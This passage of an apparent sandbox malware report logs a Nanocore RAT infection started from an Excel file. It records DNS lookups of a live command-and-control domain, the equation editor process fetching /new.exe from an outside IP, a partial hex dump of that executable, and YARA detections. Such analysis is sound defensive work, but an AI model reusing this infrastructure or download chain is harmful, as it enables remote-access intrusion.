Jun 10, 2021 15:03:30.988729000 CEST	53	62791	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:30.989164114 CEST	62791	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:31.048005104 CEST	53	62791	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:31.106383085 CEST	50667	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:31.168591976 CEST	53	50667	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:35.206876040 CEST	54129	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:35.265264034 CEST	53	54129	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:35.265693903 CEST	54129	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:35.324527025 CEST	53	54129	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:35.352040052 CEST	65329	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:35.410969019 CEST	53	65329	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:35.411422968 CEST	65329	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:35.461893082 CEST	53	65329	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:35.531976938 CEST	60718	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:35.595300913 CEST	53	60718	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:35.607424974 CEST	60718	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:35.671281099 CEST	53	60718	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:39.710495949 CEST	49157	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:39.772531033 CEST	53	49157	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:39.772958994 CEST	49157	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:39.826380014 CEST	53	49157	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:39.917192936 CEST	57391	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:39.969060898 CEST	53	57391	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:39.970124006 CEST	57391	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:40.021734953 CEST	53	57391	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:40.081192017 CEST	61858	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:40.143261909 CEST	53	61858	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:44.216721058 CEST	62500	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:44.276437044 CEST	53	62500	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:49.476128101 CEST	51652	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:49.537969112 CEST	53	51652	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:54.748712063 CEST	62762	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:54.809482098 CEST	53	62762	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:54.810383081 CEST	62762	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:54.869023085 CEST	53	62762	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:00.081010103 CEST	56905	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:00.142191887 CEST	53	56905	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:00.170536041 CEST	54609	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:04:00.231611013 CEST	53	54609	8.8.4.4	192.168.2.22
Jun 10, 2021 15:04:00.242363930 CEST	58101	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:00.301374912 CEST	53	58101	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:00.302180052 CEST	58101	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:00.361233950 CEST	53	58101	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:04.443700075 CEST	64329	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:04.502341032 CEST	53	64329	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:04.532960892 CEST	64881	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:04:04.591433048 CEST	53	64881	8.8.4.4	192.168.2.22
Jun 10, 2021 15:04:04.599993944 CEST	55327	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:04.660171986 CEST	53	55327	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:04.660640001 CEST	55327	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:04.720690012 CEST	53	55327	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:08.752892017 CEST	59150	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:08.803862095 CEST	53	59150	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:08.804209948 CEST	59150	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:08.864819050 CEST	53	59150	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:08.930174112 CEST	63439	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:04:08.988804102 CEST	53	63439	8.8.4.4	192.168.2.22
Jun 10, 2021 15:04:08.999558926 CEST	65040	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:09.050575018 CEST	53	65040	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:09.050972939 CEST	65040	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:09.101043940 CEST	53	65040	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:13.138537884 CEST	61369	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:13.201519012 CEST	53	61369	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:13.203052998 CEST	61369	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:13.264599085 CEST	53	61369	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:13.265136957 CEST	61369	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:13.318013906 CEST	53	61369	8.8.8.8	192.168.2.22
Jun 10, 2021 15:04:18.448656082 CEST	65515	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:04:18.507755041 CEST	53	65515	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 15:02:45.234879017 CEST	192.168.2.22	8.8.8.8	0x9327	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:50.603744030 CEST	192.168.2.22	8.8.8.8	0xabc1	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:50.679866076 CEST	192.168.2.22	8.8.8.8	0xabc1	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:56.200974941 CEST	192.168.2.22	8.8.8.8	0x6295	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:56.261648893 CEST	192.168.2.22	8.8.8.8	0x6295	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:01.584630966 CEST	192.168.2.22	8.8.8.8	0x391c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:01.719466925 CEST	192.168.2.22	8.8.4.4	0xaa84	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:01.795335054 CEST	192.168.2.22	8.8.8.8	0xba44	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:01.858848095 CEST	192.168.2.22	8.8.8.8	0xba44	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:01.918698072 CEST	192.168.2.22	8.8.8.8	0xba44	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:06.126239061 CEST	192.168.2.22	8.8.8.8	0xf08a	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:06.221081972 CEST	192.168.2.22	8.8.4.4	0x79cb	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:06.285887003 CEST	192.168.2.22	8.8.4.4	0x79cb	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:06.348807096 CEST	192.168.2.22	8.8.4.4	0x79cb	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:06.465986967 CEST	192.168.2.22	8.8.8.8	0x471c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:10.559783936 CEST	192.168.2.22	8.8.8.8	0x937d	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:10.667665958 CEST	192.168.2.22	8.8.4.4	0xec	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:10.735869884 CEST	192.168.2.22	8.8.8.8	0x7d5b	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:14.851315975 CEST	192.168.2.22	8.8.8.8	0xb84b	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:14.911602020 CEST	192.168.2.22	8.8.8.8	0xb84b	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:20.203521013 CEST	192.168.2.22	8.8.8.8	0xdff9	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:25.456655979 CEST	192.168.2.22	8.8.8.8	0xa2ee	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:30.796261072 CEST	192.168.2.22	8.8.8.8	0xa921	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:30.938335896 CEST	192.168.2.22	8.8.4.4	0x2e99	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:30.989164114 CEST	192.168.2.22	8.8.4.4	0x2e99	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:31.106383085 CEST	192.168.2.22	8.8.8.8	0x46b6	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:35.206876040 CEST	192.168.2.22	8.8.8.8	0x4a3f	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:35.265693903 CEST	192.168.2.22	8.8.8.8	0x4a3f	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:35.352040052 CEST	192.168.2.22	8.8.4.4	0xa5d5	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:35.411422968 CEST	192.168.2.22	8.8.4.4	0xa5d5	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:35.531976938 CEST	192.168.2.22	8.8.8.8	0xccf5	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:35.607424974 CEST	192.168.2.22	8.8.8.8	0xccf5	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:39.710495949 CEST	192.168.2.22	8.8.8.8	0x3785	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:39.772958994 CEST	192.168.2.22	8.8.8.8	0x3785	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:39.917192936 CEST	192.168.2.22	8.8.4.4	0x4a6c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:39.970124006 CEST	192.168.2.22	8.8.4.4	0x4a6c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:40.081192017 CEST	192.168.2.22	8.8.8.8	0xcb12	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:44.216721058 CEST	192.168.2.22	8.8.8.8	0x2529	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:49.476128101 CEST	192.168.2.22	8.8.8.8	0x25a7	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:54.748712063 CEST	192.168.2.22	8.8.8.8	0x34a6	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:54.810383081 CEST	192.168.2.22	8.8.8.8	0x34a6	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:00.081010103 CEST	192.168.2.22	8.8.8.8	0xa840	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:00.170536041 CEST	192.168.2.22	8.8.4.4	0x241b	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:00.242363930 CEST	192.168.2.22	8.8.8.8	0x913c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:00.302180052 CEST	192.168.2.22	8.8.8.8	0x913c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:04.443700075 CEST	192.168.2.22	8.8.8.8	0x60ab	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:04.532960892 CEST	192.168.2.22	8.8.4.4	0xa58e	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:04.599993944 CEST	192.168.2.22	8.8.8.8	0xc8c0	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:04.660640001 CEST	192.168.2.22	8.8.8.8	0xc8c0	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:08.752892017 CEST	192.168.2.22	8.8.8.8	0x8114	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:08.804209948 CEST	192.168.2.22	8.8.8.8	0x8114	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:08.930174112 CEST	192.168.2.22	8.8.4.4	0x2c0c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:08.999558926 CEST	192.168.2.22	8.8.8.8	0x34cb	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:09.050972939 CEST	192.168.2.22	8.8.8.8	0x34cb	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:13.138537884 CEST	192.168.2.22	8.8.8.8	0x12da	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:13.203052998 CEST	192.168.2.22	8.8.8.8	0x12da	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:13.265136957 CEST	192.168.2.22	8.8.8.8	0x12da	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:18.448656082 CEST	192.168.2.22	8.8.8.8	0x188c	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 10, 2021 15:02:45.298507929 CEST	8.8.8.8	192.168.2.22	0x9327	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:50.662861109 CEST	8.8.8.8	192.168.2.22	0xabc1	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:50.740917921 CEST	8.8.8.8	192.168.2.22	0xabc1	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:56.260792017 CEST	8.8.8.8	192.168.2.22	0x6295	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:02:56.321379900 CEST	8.8.8.8	192.168.2.22	0x6295	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:14.910526991 CEST	8.8.8.8	192.168.2.22	0xb84b	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:14.964814901 CEST	8.8.8.8	192.168.2.22	0xb84b	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:20.256688118 CEST	8.8.8.8	192.168.2.22	0xdff9	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:25.516088009 CEST	8.8.8.8	192.168.2.22	0xa2ee	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:44.276437044 CEST	8.8.8.8	192.168.2.22	0x2529	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:49.537969112 CEST	8.8.8.8	192.168.2.22	0x25a7	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:54.809482098 CEST	8.8.8.8	192.168.2.22	0x34a6	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:03:54.869023085 CEST	8.8.8.8	192.168.2.22	0x34a6	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:13.201519012 CEST	8.8.8.8	192.168.2.22	0x12da	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:13.264599085 CEST	8.8.8.8	192.168.2.22	0x12da	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:13.318013906 CEST	8.8.8.8	192.168.2.22	0x12da	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 10, 2021 15:04:18.507755041 CEST	8.8.8.8	192.168.2.22	0x188c	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

198.12.127.155

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	198.12.127.155	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 15:02:33.925414085 CEST	0	OUT	GET /new.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.12.127.155 Connection: Keep-Alive
Jun 10, 2021 15:02:34.067766905 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 10 Jun 2021 13:02:33 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Thu, 10 Jun 2021 09:45:52 GMT ETag: "a6abc-5c46641bd1c9b" Accept-Ranges: bytes Content-Length: 682684 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK\<2p@sp.textZZ\ `.rdatap`@@.datar@.ndata@.rsrcv@@

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 648 Parent PID: 584

General

Start time:	15:01:40
Start date:	10/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f9e0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2620 Parent PID: 584

General

Start time:	15:02:02
Start date:	10/06/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 2808 Parent PID: 2620

General

Start time:	15:02:05
Start date:	10/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	682684 bytes
MD5 hash:	3DEB8B7E51C21CBA0C2C723C5AF953DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 35%, ReversingLabs
Reputation:	low

Analysis Process: vbc.exe PID: 2364 Parent PID: 2808

General

Start time:	15:02:10
Start date:	10/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	682684 bytes
MD5 hash:	3DEB8B7E51C21CBA0C2C723C5AF953DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2359682562.0000000005070000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2359682562.0000000005070000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, 